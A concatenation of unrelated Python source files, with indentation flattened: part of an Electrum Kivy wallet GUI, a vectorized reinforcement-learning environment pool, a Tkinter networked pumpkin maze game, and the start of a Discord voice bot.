status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
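# The value '!' is the "send max" sentinel: the transaction below is built to
# spend all selected coins to this (possibly dummy) address, so the maximum
# spendable amount after fees can be read from the resulting output.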
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
self.logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
env_pool.py
|
"""
Vectorized environment wrappers.
"""
import numpy as np
import multiprocessing as mp
import ctypes
from baselines.common.vec_env import VecEnv
def env_worker(env_maker, conn, n_envs):
envs = [env_maker() for _ in range(n_envs)]
try:
while True:
command, data = conn.recv()
if command == "reset":
conn.send([env.reset() for env in envs])
elif command == "seed":
for env, seed in zip(envs, data):
env.seed(int(seed))
elif command == "step":
results = []
for env, action in zip(envs, data):
next_ob, rew, done, info = env.step(action)
if done:
next_ob = env.reset()
results.append((next_ob, rew, done, info))
conn.send(results)
elif command == "get_spaces":
conn.send((envs[0].observation_space, envs[0].action_space))
elif command == "render":
conn.send([env.render(mode="rgb_array") for env in envs])
elif command == "close":
break
else:
raise ValueError("Unrecognized command: {}".format(command))
except KeyboardInterrupt:
print("EnvPool worker: got KeyboardInterrupt")
finally:
conn.close()
for env in envs:
env.close()
class EnvPool(VecEnv):
"""
Uses a pool of workers to run multiple environments in parallel using
mp.Pipe (pickles data). This implementation supports multiple environments
per worker to be as flexible as possible.
"""
def __init__(self, env_maker, n_envs=None, n_parallel=None):
n_envs = n_envs or mp.cpu_count()
        n_parallel = n_parallel or max(1, mp.cpu_count() // 2)  # integer count, at least one worker
# No point in having more parallel workers than environments
self.n_parallel = n_envs if n_parallel > n_envs else n_parallel
# try to split evenly, but this isn't always possible
num_worker_envs = [
len(d) for d in np.array_split(np.arange(n_envs), self.n_parallel)
]
self.worker_env_seps = np.concatenate([[0], np.cumsum(num_worker_envs)])
self.workers, self.conns = [], []
for num_envs in self.worker_env_seps[1:] - self.worker_env_seps[:-1]:
worker_conn, master_conn = mp.Pipe()
worker = mp.Process(
target=env_worker, args=(env_maker, worker_conn, num_envs)
)
worker.daemon = True
worker.start()
self.workers.append(worker)
self.conns.append(master_conn)
self.conns[0].send(("get_spaces", None))
ob_space, ac_space = self.conns[0].recv()
super().__init__(n_envs, ob_space, ac_space)
self.waiting = False
self.closed = False
# set initial seeds
seeds = np.random.randint(low=0, high=np.iinfo(np.int32).max, size=n_envs)
self.seed(seeds)
def reset(self):
assert not self.closed
if self.waiting:
self.step_wait()
for conn in self.conns:
conn.send(("reset", None))
obs = []
for conn in self.conns:
obs.extend(conn.recv())
return np.stack(obs)
def step_async(self, actions):
assert not self.waiting and not self.closed
for conn, acts in zip(
self.conns, np.split(actions, self.worker_env_seps[1:-1])
):
conn.send(("step", acts))
self.waiting = True
def step_wait(self):
assert self.waiting and not self.closed
results = []
for conn in self.conns:
results.extend(conn.recv())
next_obs, rews, dones, infos = zip(*results)
self.waiting = False
return np.stack(next_obs), np.stack(rews), np.stack(dones), infos
def seed(self, seeds):
assert not self.waiting and not self.closed
for conn, data in zip(self.conns, np.split(seeds, self.worker_env_seps[1:-1])):
conn.send(("seed", data))
def close_extras(self):
if self.waiting:
self.step_wait()
for conn in self.conns:
conn.send(("close", None))
conn.close()
for worker in self.workers:
worker.join()
def get_images(self):
assert not self.waiting and not self.closed
for conn in self.conns:
conn.send(("render", None))
imgs = []
for conn in self.conns:
imgs.extend(conn.recv())
return imgs
_NP_TO_CT = {
np.float32: ctypes.c_float,
np.int32: ctypes.c_int32,
np.int8: ctypes.c_int8,
np.uint8: ctypes.c_char,
    np.bool_: ctypes.c_bool,  # np.bool_ is the dtype scalar type returned by dtype.type
}
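# Illustrative sketch (not part of the original module): how the dtype-to-ctypes
# map above is used to share one observation slot between processes, mirroring
# what ShmEnvPool.__init__ and _decode_obses do below. The shape and dtype are
# arbitrary assumptions; nothing in this file calls this helper.
def _shm_slot_example(shape=(4,), dtype=np.float32):
    buf = mp.Array(_NP_TO_CT[np.dtype(dtype).type], int(np.prod(shape)))
    view = np.frombuffer(buf.get_obj(), dtype=dtype).reshape(shape)
    np.copyto(view, np.zeros(shape, dtype=dtype))  # writes go straight into shared memory
    return buf, view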
def shm_worker(env_maker, conn, n_envs, obs_bufs, obs_shape, obs_dtype):
envs = [env_maker() for _ in range(n_envs)]
def _write_obs(obs):
for ob, obs_buf in zip(obs, obs_bufs):
dst = obs_buf.get_obj()
dst_np = np.frombuffer(dst, dtype=obs_dtype).reshape(obs_shape)
np.copyto(dst_np, ob)
try:
while True:
command, data = conn.recv()
if command == "reset":
conn.send(_write_obs([env.reset() for env in envs]))
elif command == "seed":
for env, seed in zip(envs, data):
env.seed(int(seed))
elif command == "step":
results, obs = [], []
for env, action in zip(envs, data):
ob, rew, done, info = env.step(action)
if done:
ob = env.reset()
results.append((rew, done, info))
obs.append(ob)
_write_obs(obs)
conn.send(results)
elif command == "render":
conn.send([env.render(mode="rgb_array") for env in envs])
elif command == "close":
break
else:
raise RuntimeError("Unrecognized command: {}".format(command))
except KeyboardInterrupt:
print("ShmEnvPool worker: got KeyboardInterrupt")
finally:
conn.close()
for env in envs:
env.close()
class ShmEnvPool(VecEnv):
"""
Uses a pool of workers to run multiple environments in parallel using shared
memory to pass observations. This implementation supports multiple
environments per worker to be as flexible as possible.
"""
def __init__(self, env_maker, n_envs=None, n_parallel=None):
n_envs = n_envs or mp.cpu_count()
        n_parallel = n_parallel or max(1, mp.cpu_count() // 2)  # integer count, at least one worker
dummy = env_maker()
ob_space, ac_space = dummy.observation_space, dummy.action_space
del dummy
super().__init__(n_envs, ob_space, ac_space)
# No point in having more parallel workers than environments
self.n_parallel = n_envs if n_parallel > n_envs else n_parallel
# try to split evenly, but this isn't always possible
num_worker_envs = [
len(d) for d in np.array_split(np.arange(n_envs), self.n_parallel)
]
self.worker_env_seps = np.concatenate([[0], np.cumsum(num_worker_envs)])
self.obs_dtype, self.obs_shape = ob_space.dtype, ob_space.shape
self.obs_bufs = []
for _ in range(n_envs):
self.obs_bufs.append(
mp.Array(_NP_TO_CT[ob_space.dtype.type], int(np.prod(ob_space.shape)))
)
self.workers, self.conns = [], []
for beg, end in zip(self.worker_env_seps[:-1], self.worker_env_seps[1:]):
worker_conn, master_conn = mp.Pipe()
worker = mp.Process(
target=shm_worker,
args=(
env_maker,
worker_conn,
end - beg,
self.obs_bufs[beg:end],
ob_space.shape,
ob_space.dtype,
),
)
worker.daemon = True
worker.start()
self.workers.append(worker)
self.conns.append(master_conn)
self.waiting = False
self.closed = False
# set initial seeds
seeds = np.random.randint(low=0, high=np.iinfo(np.int32).max, size=n_envs)
self.seed(seeds)
def reset(self):
assert not self.closed
if self.waiting:
self.step_wait()
for conn in self.conns:
conn.send(("reset", None))
for conn in self.conns:
conn.recv()
return self._decode_obses()
def step_async(self, actions):
assert not self.waiting and not self.closed
for conn, acts in zip(
self.conns, np.split(actions, self.worker_env_seps[1:-1])
):
conn.send(("step", acts))
self.waiting = True
def step_wait(self):
assert self.waiting and not self.closed
results = []
for conn in self.conns:
results.extend(conn.recv())
rews, dones, infos = zip(*results)
self.waiting = False
return self._decode_obses(), np.stack(rews), np.stack(dones), infos
def seed(self, seeds):
assert not self.waiting and not self.closed
for conn, data in zip(self.conns, np.split(seeds, self.worker_env_seps[1:-1])):
conn.send(("seed", data))
def close_extras(self):
if self.waiting:
self.step_wait()
for conn in self.conns:
conn.send(("close", None))
conn.close()
for worker in self.workers:
worker.join()
self.obs_bufs.clear()
def get_images(self):
assert not self.waiting and not self.closed
for conn in self.conns:
conn.send(("render", None))
imgs = []
for conn in self.conns:
imgs.extend(conn.recv())
return imgs
def _decode_obses(self):
results = [
np.frombuffer(b.get_obj(), dtype=self.obs_dtype).reshape(self.obs_shape)
for b in self.obs_bufs
]
return np.stack(results)
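# Hedged usage sketch (not part of the original module): drives an EnvPool with a
# hypothetical gym-based env_maker. Assumes gym is installed, the classic
# reset()/4-tuple step() API the workers above rely on, and the default 'fork'
# start method on Linux; ShmEnvPool can be swapped in for image observations.
if __name__ == "__main__":
    import gym

    def make_env():
        return gym.make("CartPole-v1")

    pool = EnvPool(make_env, n_envs=4, n_parallel=2)
    obs = pool.reset()
    for _ in range(10):
        actions = np.array([pool.action_space.sample() for _ in range(pool.num_envs)])
        pool.step_async(actions)
        obs, rews, dones, infos = pool.step_wait()
    pool.close()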
|
doyouhaveguts.py
|
otherLevels=True
import Tkinter
from Tkinter import *
import time
import random
import socket
from threading import Thread
from PIL import ImageTk
import pygame
#If using other versions of the creator, change the names in the functions
# createWalls and createMonsters
import monster
if otherLevels:
import monstercreatorOther as monstercreator
else:
import monstercreator
if otherLevels:
import wallcreatorOther as wallcreator
else:
import wallcreator
pygame.mixer.init()
pygame.mixer.music.load("res/music.mp3")
pygame.mixer.music.play(-1)
top = Tkinter.Tk()
top.configure(background='light yellow')
####################### Network stuff
m = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with open("ip.txt") as f:
opponent = f.readline().strip()
print opponent
def send(msg): # Send message to other computer
m.sendto(msg, (str(opponent), 5505))
def listen():
r = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
r.bind(("0.0.0.0", 5505))
while True:
data, addr = r.recvfrom(1024)
keypressForeign(data)
    r.close()
def keypressLocal(event):
send(event.keysym)
def keypressForeign(data): # Process incoming message
print data
global updateNextButton
global level
global goToNextLevel
global goToDead
if data == 'Up' or data == 'w':
turnUp()
stop()
if data == 'Down' or data == 's':
turnDown()
stop()
if data == 'Left' or data == 'a':
turnLeft()
stop()
if data == 'Right' or data == 'd':
turnRight()
stop()
if data == 'xDead':
global lives
lives -= 1
if lives == 0:
goToDead = True
print "Partner hit a monster", str(lives)
newloc = (1, 1)
if data == 'xOneFinished':
global otherFinished
otherFinished = True
if data == 'xAllFinished':
updateNextButton = True
if data[:8] == 'xLevelUp':
if int(data[8:]) != level:
goToNextLevel = True
print goToNextLevel, "Test1"
top.bind("<Key>", keypressLocal)
listener = Thread(target=listen)
listener.daemon = True
listener.start()
#######################
# Initialize images
##Changed pictures 1.31 SOHVA
grass = ImageTk.PhotoImage(file="res/background.png")
foodimage = ImageTk.PhotoImage(file="res/spiderBG.png")
pumpkinImage = ImageTk.PhotoImage(file="res/pumpkin2BG.png")
happyImage = ImageTk.PhotoImage(file="res/happy_pumpkinBG.png")
scaredImage = ImageTk.PhotoImage(file="res/pumpkin_scaredBG.png")
monsterImages = [ImageTk.PhotoImage(file="res/ghostBG.png"), \
ImageTk.PhotoImage(file="res/82872-200BG.png"), \
ImageTk.PhotoImage(file="res/mouseBG.png")]
monsterImage = monsterImages[random.randint(0, len(monsterImages) - 1)]
trophy = ImageTk.PhotoImage(file="res/trophyBG.png")
grave = ImageTk.PhotoImage(file="res/graveBG.png")
# Creates the initial pumpkin
def createPumpkin():
global pumpkin
##SNAKE MODIFIED 1.1 SOHVA
pumpkin = (1, 1)
def newGame():
global monsterImage
global monsterImages
global pumpkin
global sGrid
global food
global columns
global rows
global game_on
global direction
global new_direction
global foodlist
global level
global lives
lives = 7
liveslabel.configure(text = "You have "+str(lives)+" attempts")
for row in sGrid:
for item in row:
item.configure(image = grass, bg = "grey")
refreshLives()
# liveslabel.configure(text = "You have "+str(lives)+" attempts")
monsterImage = monsterImages[random.randint(0,len(monsterImages)-1)]
level = 1
createWalls(level)
createMonsters(level)
createPumpkin()
sGrid[pumpkin[0]][pumpkin[1]].configure(image = pumpkinImage)
foodlist=[]
#get_score()
global numFood
numFood = random.randint(1,3)
    for i in range(0, numFood):
        addFood()  # addFood() already appends the new food location to foodlist
for food in foodlist:
sGrid[food[0]][food[1]].configure(image = foodimage)
game_on = True
direction = (0,-1)
new_direction = (0,-1)
levellabel.configure(text = "Level: " + str(level))
def addFood():
global pumpkin
global sGrid
global food
global columns
global rows
global foodlist
while True:
        # Chooses a random location
        chosen = (random.randint(2, rows - 3), random.randint(2, columns - 3))
        # Checks that it doesn't land on the pumpkin, a wall, the finish or a monster route
monLocs = giveMonLocs(monsters)
if chosen != pumpkin and chosen not in walls and chosen != finish and chosen not in monLocs:
food = chosen
foodlist.append(food)
break
def game():
global otherFinished
global goToNextLevel
global goToDead
global pumpkin
global direction
global game_on
global highscore
global numFood
global foodlist
global updateNextButton
global level
createWalls(level)
global lives
global moves
global movesOnce
refreshLives()
statelabel.configure(text="Task: get the trophies")
##Adding monsters 1.3 SOHVA
global monsters
##Adding finish 1.4 Sohva
global finish
##Adding wall 1.5 Sohva
global walls
sGrid[finish[0]][finish[1]].configure(image=trophy)
game_on = True
for monster in monsters:
monloc = monster.getLoc()
sGrid[monloc[0]][monloc[1]].configure(image=grass)
monster.move()
monloc = monster.getLoc()
sGrid[monloc[0]][monloc[1]].configure(image=monsterImage)
loc = pumpkin
# Update the location
if moves or movesOnce:
newloc = ((loc[0] + direction[0]) % rows, (loc[1] + direction[1]) % columns)
movesOnce = False
for wall in walls:
if newloc == wall:
newloc = loc
else:
newloc = loc
##Check for the collision with monster 1.3 SOHVA
for monster in monsters:
if newloc == monster.getLoc():
lives -= 1
refreshLives()
if lives == 0:
dead()
send("xDead")
print "Hit a monster"
newloc = (1, 1)
if newloc == finish:
send("xOneFinished")
##FOR TESTING
#otherFinished = True
##
if otherFinished == True:
send("xAllFinished")
nextButton.configure(state="normal")
if level == 3:
winwin()
else:
win()
print "Game nearly Won!"
for i in range(len(foodlist)):
if newloc == foodlist[i]:
lives -= 1
refreshLives()
if lives == 0:
dead()
nextloc = newloc[0] - direction[0], newloc[1] - direction[1]
while nextloc not in walls:
newloc = nextloc
nextloc = newloc[0] - direction[0], newloc[1] - direction[1]
sGrid[pumpkin[0]][pumpkin[1]].configure(image=grass)
pumpkin = newloc
# Make the head to point to the right direction
nextloc = (newloc[0] + direction[0], newloc[1] + direction[1])
nextLocs = giveNextLocs(pumpkin)
pumpkinhead = pumpkinImage
if finish in nextLocs or newloc == finish:
pumpkinhead = happyImage
else:
for loc in nextLocs:
if loc in foodlist:
pumpkinhead = scaredImage
break
for monster in monsters:
if monster.getLoc() in nextLocs:
pumpkinhead = scaredImage
break
sGrid[newloc[0]][newloc[1]].configure(image=pumpkinhead)
if goToNextLevel:
levelUp()
goToNextLevel = False
if updateNextButton:
nextButton.configure(state="normal")
updateNextButton = False
if goToDead:
dead()
goToDead = False
##Version 1.2 SOHVA ADDED MOVES VARIABLE FOR DECIDING WHETHER PLAYER MOVES OR NOT
##Version 1.22 SOHVA FIXED A BUG WITH THE SNAKE MOVEMENT
def turnRight():
global direction
global new_direction
global moves
global movesOnce
new_direction = (0, 1)
moves = True
movesOnce = True
def turnLeft():
global direction
global new_direction
global moves
global movesOnce
new_direction = (0, -1)
moves = True
movesOnce = True
def turnUp():
global direction
global new_direction
global moves
global movesOnce
new_direction = (-1, 0)
moves = True
movesOnce = True
def turnDown():
global direction
global new_direction
global moves
global movesOnce
new_direction = (1, 0)
moves = True
movesOnce = True
def pause():
global game_on
game_on = not game_on
##VERSION 1.2 SOHVA STOPS PLAYER MOVEMENT
def stop():
global moves
moves = False
def createWalls(level):
global walls
walls = []
walls = wallcreator.createWalls(level)
for wall in walls:
sGrid[wall[0]][wall[1]].configure(image=grave)
def createMonsters(level):
global monsters
monsters = monstercreator.createMonsters(level)
def levelUp():
global otherFinished
global nextButton
otherFinished = False
global foodlist
global walls
global monsters
global level
global pumpkin
global monsterImage
global monsterImages
monsterImage = monsterImages[random.randint(0, len(monsterImages) - 1)]
for row in sGrid:
for square in row:
square.configure(image=grass)
nextButton.config(state="disabled")
    global game_on
    game_on = True
pumpkin = (1, 1)
level += 1
send("xLevelUp" + str(level))
levellabel.configure(text="Level: " + str(level))
createMonsters(level)
createWalls(level)
foodlist = []
addFood()
for food in foodlist:
sGrid[food[0]][food[1]].configure(image=foodimage)
nextButton.configure(state="disabled")
# Gives the locations in which the monsters can be
def giveMonLocs(monsters):
locs = []
for monster in monsters:
locs += monster.getRoute()
return locs
def giveNextLocs(pumpkin):
return [(pumpkin[0] - 1, pumpkin[1]), (pumpkin[0] + 1, pumpkin[1]), \
(pumpkin[0], pumpkin[1] - 1), (pumpkin[0], pumpkin[1] + 1)]
lives = 7
liveslabel = Tkinter.Label(top, text=str(lives) + " lives left", fg="brown", background='light yellow')
def refreshLives():
global liveslabel
global lives
liveslabel.config(text=str(lives) + " lives left")
columns = 15
rows = 10
game_on = True
pumpkin = []
highscore = 0
foodlist = []
finish = (rows - 3, columns - 3)
walls = []
refreshLives()
liveslabel.grid(row=0, columnspan=5, column=4)
statelabel = Tkinter.Label(top, text="", font=("Helvetica", 10, "bold italic"), fg="brown", background='light yellow')
statelabel.grid(row=0, columnspan=6, column=9)
# Create the grid
sGrid = []
for rownum in range(rows):
row = []
for colnum in range(columns):
label = Tkinter.Label(top, image=grass, bg="#6d6764", bd=0)
row += [label]
label.grid(row=rownum + 1, column=colnum)
sGrid += [row]
createPumpkin()
createMonsters(1)
##1.6 SOHVA adds the variable for level
level = 1
levellabel = Tkinter.Label(top, text="Level: " + str(level),fg="brown", background='light yellow')
levellabel.grid(row=0, columnspan=5, column=0)
createWalls(1)
# Place the food
addFood()
for food in foodlist:
sGrid[food[0]][food[1]].configure(image=foodimage)
# Tells how to change coordinates
# up = (-1,0); down = (1,0); left = (0,-1); right = (0,1)
direction = (0, -1) # Left
new_direction = (0, -1)
## VERSION 1.2 SOHVA a boolean for the player movement
moves = False
movesOnce = False
otherFinished = False
updateNextButton = False
goToNextLevel = False
goToDead = False
quitButton = Tkinter.Button(top, text="Quit",fg="brown", command=top.destroy, background='light yellow', relief = RIDGE, bd=3,highlightcolor="red")
quitButton.grid(row=0, column=columns + 1, rowspan=2)
newButton = Tkinter.Button(top, text="New Game", fg="brown",command=newGame, background='light yellow', relief = RIDGE, bd=3,highlightcolor="red")
newButton.grid(row=1, column=columns + 1, rowspan=2)
nextButton = Tkinter.Button(top, text="Next Level", fg="brown",command=levelUp, state="disabled", background='light yellow', relief = RIDGE, bd=3, highlightcolor="red")
nextButton.grid(row=2, column=columns + 1, rowspan=2)
top.title("Why Not a Pumpkin Apocalypse?")
# Keeps track of the level
def dead():
global game_on
global statelabel
if game_on:
game_on = False
statelabel.configure(text="Game over")
def winwin():
global statelabel
statelabel.configure(text="You win!")
def win():
# global game_on
global statelabel
statelabel.configure(text="Good job! Keep going")
while True:
if game_on:
game()
for i in range(10):
time.sleep((0.35 - level * 0.05) / 10)
top.update_idletasks()
top.update()
direction = new_direction
|
main.py
|
import discord
import requests
from discord.ext import commands
from threading import Thread, Lock
from datetime import datetime
import asyncio
from flask import Flask, request
import values
client = commands.Bot(command_prefix=values.command_prefix)
lock = Lock() # Locked by the say command. released by the callback from resemble that gets sent to the flask app
@client.command()
async def join(ctx):
voiceChannel = discord.utils.get(ctx.guild.voice_channels, name=values.Channel_Name)
voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
if voice is None or not voice.is_connected():
await voiceChannel.connect()
#voice = discord.utils.get(client.voice_clients, guild=ctx.guild)
